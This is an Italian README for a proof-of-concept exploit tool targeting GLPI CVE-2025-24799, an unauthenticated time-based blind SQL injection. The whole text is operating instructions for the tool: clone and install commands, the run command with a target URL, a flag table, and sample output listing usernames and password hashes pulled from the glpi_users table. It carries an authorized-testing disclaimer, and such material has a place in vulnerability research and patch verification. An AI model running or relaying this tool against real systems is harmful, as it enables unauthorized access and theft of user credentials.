
Sfrutta GLPI CVE-2025-24799 tramite SQL injection cieca basata sul tempo senza autenticazione per estrarre nomi utente e hash delle password da glpi_users per test di sicurezza autorizzati.
CVE-2025-24799 è un exploit proof-of-concept (PoC) che ha come bersaglio GLPI.
Questo exploit dimostra una SQL Injection non autenticata (blind basata sul tempo) per estrarre le credenziali degli utenti.
Disclaimer: Questo PoC ha solo scopo educativo. Non utilizzarlo su sistemi senza autorizzazione.
glpi_users e le colonne richieste (name e password)git clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
Requisiti:
requests,colorama,beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| Flag | Descrizione | Obbligatorio | Predefinito |
|---|---|---|---|
-u, --url | URL di destinazione | Sì | - |
La console mostra:
[•][✔][✖][i]Esempio:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
Sono uno sviluppatore attivo a cui piace creare strumenti e condividere conoscenza. Puoi contattarmi tramite: